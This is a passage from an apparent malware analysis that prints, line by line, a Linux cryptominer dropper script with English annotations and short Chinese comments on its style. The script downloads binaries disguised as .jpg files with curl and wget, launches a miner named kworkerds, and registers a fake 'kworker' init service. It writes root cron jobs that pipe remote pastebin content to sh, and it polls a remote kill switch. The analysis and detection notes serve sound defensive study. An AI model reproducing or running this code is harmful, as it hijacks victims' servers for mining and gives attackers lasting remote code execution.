    # a second miner build to /bin/kworkerds, started when no 13531 connection
    # exists; curl calls carry --connect-timeout 120 here.
21  pm=$(netstat -anp | grep 13531 | wc -l)
22  if [ ${pm} -eq 0 ]; then
23    if [ ! -f "/bin/config.json" ]; then
24      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
25      if [ ! -f "/bin/config.json" ]; then
26        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
27      fi
28    fi
29    if [ ! -f "/bin/kworkerds" ]; then
30      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
31      if [ ! -f "/bin/kworkerds" ]; then
32        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
33      fi
34      nohup /bin/kworkerds >/dev/null 2>&1 &
35    else
36      nohup /bin/kworkerds >/dev/null 2>&1 &
37    fi
38  fi
39}
40
41function init() {
    # Persistence #4: a SysV service named "kworker", mimicking the kernel's
    # kworker threads (which have no file on disk). A binary at /usr/sbin/kworker
    # and an init script at /etc/init.d/kworker are pulled from ".jpg" URLs, made
    # mode 777, then enabled with `chkconfig --add` (RHEL/CentOS-style; on systems
    # without chkconfig the registration simply fails). Detection: the two paths
    # above and `chkconfig --list kworker`.
42  if [ ! -f "/usr/sbin/kworker" ]; then
43    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
44    if [ ! -f "/usr/sbin/kworker" ]; then
45      wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
46    fi
47  fi
48  if [ ! -f "/etc/init.d/kworker" ]; then
49    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
50    if [ ! -f "/etc/init.d/kworker" ]; then
51      wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
52    fi
53  fi
54  chkconfig --add kworker
55}
56
57function echocron() {
    # Same three cron locations as the stage-2 script, without the timestomping
    # touch lines. The cron.d entry here lacks -fsSL: without -f, curl passes a
    # non-2xx response body straight to sh.
58  echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
59  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
60  mkdir -p /var/spool/cron/crontabs
61  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
62}
63
64update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
  # Same remote kill/update switch as the stage-2 script ("update" wipes the
  # payloads and keeps only cron). The non-update branch here is leaner — no
  # spreader, no competitor cleanup, no log wiping — and adds the init.d service.
65if [ ${update}x = "update"x ]; then
66  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
67  echocron
68else
69  downloadrun
70  init
71  echocron
72  sleep 10
73  port=$(netstat -anp | grep 13531 | wc -l)
74  if [ ${port} -eq 0 ]; then
75    downloadrunxm
76  fi
77fi
78#
79#�

这脚本不得不说,真的有毒。

用sh作为解释器,写函数的时候前面却还加了非POSIX的function关键字

重命名成httpdns丢到bin目录,还给了执行权限。

在crontab里面增加了定时任务。